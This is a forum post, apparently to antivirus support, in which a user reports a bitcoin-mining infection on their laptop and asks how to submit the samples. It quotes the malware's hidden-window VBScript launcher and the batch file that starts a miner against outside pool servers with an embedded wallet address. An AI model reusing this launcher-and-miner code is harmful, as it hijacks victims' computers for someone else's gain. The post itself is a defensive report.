Hi,
I was playing with Whireshark a few days back and noticed an outgoing connection to a bitcoin mining site. A small investigation did not show anything out of the ordinary so I assumed I did not understand Whireshark enough. Today I found my laptop very active while not doing much on it and found the process "win32.exe" keeping the processor busy for 25%.
An investigation with hijackthis, google and a look in msconfig showed that "win32.exe" was connected to "c:\kernels\drivers.vbs". The content of the file as follows:
Const HIDDEN_WINDOW = 12
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("C:/kernels/processor.bat", null, objConfig, intProcessID)
This points to "C:/kernels/processor.bat" with the following content:
@echo off
START /D C: /B win32.exe -u http://ophelion_1:123@mergedmining.btcguild.com:8332 -b http://1ERX1hr6xbGDgt8cB2whUf9HpeqzTqp3T:x@mining.eligius.st:8337 -k poclbm DEVICE=0 AGGRESSION=0
Which turns out to be the site I noticed with Whireshark.
Both files are "No thread" according to Avast Free.
The people at eligius.st are familiar with bot nets and note in their FAQ that Avast has blacklisted their server.
With a computer search I found "win32.exe" in the c:\ directory, also to be found as "No threat" by Avast.
As these files are found to be clean, I can not upload them via the virus chest. Is there another way?
Info on drivers.vbs can also be found on
http://www.exterminate-it.com/malpedia/file/drivers.vbs, where I have the file with the "d7e9141ccaa04c07b2a3fb72608033fb" hash. I have not looked into the files mentioned there, but it seems I have a Trojan which injected the above files to make my pc part of a mining bot net.
MvR
-----
Wish a wrong captcha would not delete my text...
